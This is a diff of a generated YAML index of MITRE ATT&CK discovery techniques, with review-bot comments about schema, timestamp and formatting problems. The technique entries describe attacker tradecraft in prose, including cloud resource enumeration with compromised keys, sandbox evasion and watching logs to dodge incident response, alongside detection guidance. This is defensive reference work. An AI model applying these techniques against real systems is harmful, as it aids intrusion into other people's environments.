lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+ An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Regina Elwell
- Praetorian
- Isif Ibrahima, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+ components. Monitor logs for actions that could be taken to gather information
+ about cloud infrastructure, including the use of discovery API calls by new
+ or unexpected users and enumerations from unknown or malicious IP addresses.
+ To reduce false positives, valid change management procedures could introduce
+ a known identifier that is logged with the change (e.g., tag or header) if
+ supported by the cloud provider, to help distinguish valid, expected actions
+ from malicious ones.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Instance: Instance Enumeration'
+ - 'Cloud Storage: Cloud Storage Enumeration'
+ - 'Volume: Volume Enumeration'
+ - 'Snapshot: Snapshot Enumeration'
type: attack-pattern
id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
created: '2020-08-20T17:51:25.671Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1580
url: https://attack.mitre.org/techniques/T1580
+ external_id: T1580
- source_name: Expel IO Evil in AWS
- url: https://expel.io/blog/finding-evil-in-aws/
description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
Evil in AWS. Retrieved June 25, 2020.
+ url: https://expel.io/blog/finding-evil-in-aws/
- source_name: AWS Head Bucket
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
14, 2022.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
- source_name: AWS Get Public Access Block
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
- source_name: AWS Describe DB Instances
- url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
- source_name: Amazon Describe Instance
- url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
description: Amazon. (n.d.). describe-instance-information. Retrieved March
3, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
- source_name: Amazon Describe Instances API
- url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
- source_name: Google Compute Instances
- url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
description: Google. (n.d.). gcloud compute instances list. Retrieved May
26, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
- source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
- source_name: Microsoft AZ CLI
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
- url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
- Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
- An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Infrastructure Discovery
- x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
- components. Monitor logs for actions that could be taken to gather information
- about cloud infrastructure, including the use of discovery API calls by new
- or unexpected users and enumerations from unknown or malicious IP addresses.
- To reduce false positives, valid change management procedures could introduce
- a known identifier that is logged with the change (e.g., tag or header) if
- supported by the cloud provider, to help distinguish valid, expected actions
- from malicious ones.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Instance: Instance Enumeration'
- - 'Cloud Storage: Cloud Storage Enumeration'
- - 'Volume: Volume Enumeration'
- - 'Snapshot: Snapshot Enumeration'
- x_mitre_attack_spec_version: 2.1.0
+ url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1580
atomic_tests: []
T1217:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-16T14:24:40.625Z'
name: Browser Bookmark Discovery
description: |-
Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
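Review bot: the re-emitted T1580 `description` (the `+` block starting `An adversary may attempt to discover infrastructure`) still carries a hard line break immediately after each API or command name (`DescribeInstances`, `ListBuckets`, `HeadBucket`, `GetPublicAccessBlock`, `gcloud compute instances list`, `az vm list`, `DescribeDBInstances`), which is what stripped `<code>` tags look like once the surrounding HTML is removed; since the text is being rewritten wholesale here, the generator could convert those tags to backticks, as the T1654 description in this same file already does for `wevtutil.exe` and `CollectGuestLogs.exe`, instead of dropping them. Two smaller items in the same hunk: the `Microsoft AZ CLI` reference keeps a URL and description for `az ad user` while the description text cites it for `az vm list`, so the citation does not support the sentence it is attached to (an upstream ATT&CK issue, but worth flagging rather than silently carrying forward); and T1217 `modified` moves backwards, from `'2023-05-09T14:00:00.188Z'` to `'2023-04-16T14:24:40.625Z'`, which the commit message should explain if the source of the timestamp changed.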
@@ -49565,7 +50259,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1217
atomic_tests: []
T1016:
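Review bot: `spec_version: '2.1'` is dropped from this object, and from every other technique object in the patch, while `x_mitre_attack_spec_version` is raised to 3.2.0, with nothing put in its place. In STIX 2.1 `spec_version` is a required common property on every object, so any consumer that validates these embedded objects as STIX 2.1 will now reject them; if the generator switched to an upstream bundle that omits the key, the commit message should say so, otherwise the key should be kept.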
@@ -49595,7 +50288,7 @@ discovery:
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
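Review bot: the replacement `{{LinkById|T1059.008}` in the T1016 detection text has two opening braces and one closing brace, and neither this nor the old `(LinkById: T1059.008)` is a form that anything in this file renders; the rest of the same sentence already uses plain markdown links (`[Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)`), so the reference to T1059.008 (Network Device CLI) should be emitted as `[Network Device CLI](https://attack.mitre.org/techniques/T1059/008)` like its neighbours. If the value is copied verbatim from upstream, it is worth normalising in the generator rather than committing the unbalanced marker.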
@@ -49633,12 +50326,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016
atomic_tests: []
T1087:
technique:
- modified: '2024-01-12T23:36:56.245Z'
+ modified: '2024-10-15T15:35:28.784Z'
name: Account Discovery
description: |-
Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -49665,14 +50357,13 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
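Review bot: T1087 loses the `Azure AD`, `Office 365` and `Google Workspace` platforms and gains `Office Suite` and `Identity Provider` (version `2.4` to `2.5`), and T1087.003 earlier in the patch picks up `Office Suite` the same way. Anything downstream that selects techniques by the old platform strings (per-platform index files, filters, test matrices) will now silently drop T1087 and its sub-techniques unless it is taught the new names, so the generator's platform mapping should be updated in this same change, and the commit message should state that the rename follows the upstream platform consolidation rather than a local edit.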
@@ -49701,7 +50392,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1482:
technique:
@@ -49761,7 +50451,7 @@ discovery:
.NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
[Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T19:18:22.305Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Domain Trust Discovery
x_mitre_detection: |
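Review bot: T1482 `modified` moves backwards, from `'2022-11-08T14:00:00.188Z'` to `'2022-06-16T19:18:22.305Z'`, and the same happens to T1217, T1049 and T1619 elsewhere in this patch; every old value ends in the identical `14:00:00.188Z`, which looks like a release-wide stamp rather than a per-object edit time, while the new values carry distinct millisecond fractions. That is consistent with switching to each object's own `modified` timestamp, but a timestamp that decreases will confuse any consumer that uses `modified` to decide whether an object is newer, so the commit message should say where the new values come from and the tooling that reads this index should be checked for "newest wins" logic.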
@@ -49780,7 +50470,6 @@ discovery:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1482
atomic_tests: []
T1083:
@@ -49849,12 +50538,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1083
atomic_tests: []
T1049:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-09-06T22:35:34.231Z'
name: System Network Connections Discovery
description: "Adversaries may attempt to get a listing of network connections
to or from the compromised system they are currently accessing or from remote
@@ -49931,40 +50619,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1049
atomic_tests: []
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -49976,6 +50635,10 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -49986,8 +50649,14 @@ discovery:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -49997,9 +50666,28 @@ discovery:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1619:
technique:
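Review bot: the T1497 reordering spread across this and the preceding three hunks moves `x_mitre_platforms`, `x_mitre_contributors`, `id`, `created`, `created_by_ref` and `external_references` without changing their values, with one exception: the `Deloitte Environment Awareness` reference, whose URL gains an `/edit` suffix and whose retrieval date moves from May 18, 2021 to September 13, 2024 (the same edit is applied to that reference under T1497.003). Please confirm the new URL actually resolves, since a Google Drive `file/d/<id>` link with `/edit` appended is not the form the old entry used. More generally, emitting keys in a stable order (sorted, or the upstream order captured once) would keep future diffs to real value changes; as it stands nearly every changed line in these hunks is ordering churn.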
@@ -50032,7 +50720,7 @@ discovery:
Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-11T22:29:43.677Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Cloud Storage Object Discovery
x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -50050,12 +50738,11 @@ discovery:
- 'Cloud Storage: Cloud Storage Enumeration'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1619
atomic_tests: []
T1654:
technique:
- modified: '2023-09-30T22:18:46.711Z'
+ modified: '2024-10-15T12:24:40.892Z'
name: Log Enumeration
description: |-
Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -50063,11 +50750,14 @@ discovery:
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+ In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
x_mitre_contributors:
- Bilal Bahadır Yenici
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -50078,7 +50768,7 @@ discovery:
- macOS
- Windows
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -50092,6 +50782,10 @@ discovery:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1654
external_id: T1654
+ - source_name: Permiso GUI-Vil 2023
+ description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+ Cloud Threat Actor. Retrieved August 30, 2024.'
+ url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
- source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -50111,56 +50805,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1654
atomic_tests: []
T1087.004:
technique:
- x_mitre_platforms:
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
- type: attack-pattern
- created: '2020-02-21T21:08:36.570Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.004
- url: https://attack.mitre.org/techniques/T1087/004
- - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
- source_name: Microsoft msolrolemember
- - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
- 6, 2019.
- url: https://github.com/True-Demon/raindance
- source_name: GitHub Raindance
- - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Microsoft AZ CLI
- - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
- Directory Leaks via Azure. Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
- source_name: Black Hills Red Teaming MS AD Azure, 2018
- - source_name: AWS List Roles
- description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
- - source_name: AWS List Users
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
- description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
- - source_name: Google Cloud - IAM Servie Accounts List API
- url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
- description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
- August 4, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:51:18.808Z'
name: Cloud Account
description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
accounts are those created and configured by an organization for use by users,
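Review bot: `spec_version: '2.1'` is removed from every technique object in this diff (first at the T1654 `- spec_version: '2.1'` line above); if any downstream consumer or validation step reads that STIX field, it needs updating, and the schema change should be called out explicitly in the PR description. Secondary point for the T1087.004 block: the object is deleted and re-emitted in a different key order, so the hunk reads as a full rewrite rather than showing the real changes (the `modified` bump, contributor and platform updates); having the sync script emit keys in a fixed order would keep future diffs reviewable.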
@@ -50182,19 +50831,61 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+ created: '2020-02-21T21:08:36.570Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1087/004
+ external_id: T1087.004
+ - source_name: AWS List Roles
+ description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+ - source_name: AWS List Users
+ description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+ - source_name: Black Hills Red Teaming MS AD Azure, 2018
+ description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+ Directory Leaks via Azure. Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+ - source_name: Google Cloud - IAM Servie Accounts List API
+ description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+ August 4, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+ - source_name: Microsoft AZ CLI
+ description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+ - source_name: Microsoft msolrolemember
+ description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+ - source_name: GitHub Raindance
+ description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+ 6, 2019.
+ url: https://github.com/True-Demon/raindance
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1057:
technique:
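Review bot: `x_mitre_permissions_required: [User]` is dropped from T1087.004 with no replacement field, so anything that filters atomics by required permission level will now see nothing for this technique; confirm that is the intended upstream shape. Also, the `Servie` typo is carried into the new `source_name: Google Cloud - IAM Servie Accounts List API` line; since `source_name` is the citation key, leave it unchanged unless the description's `(Citation: ...)` marker is renamed in the same commit.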
@@ -50265,46 +50956,11 @@ discovery:
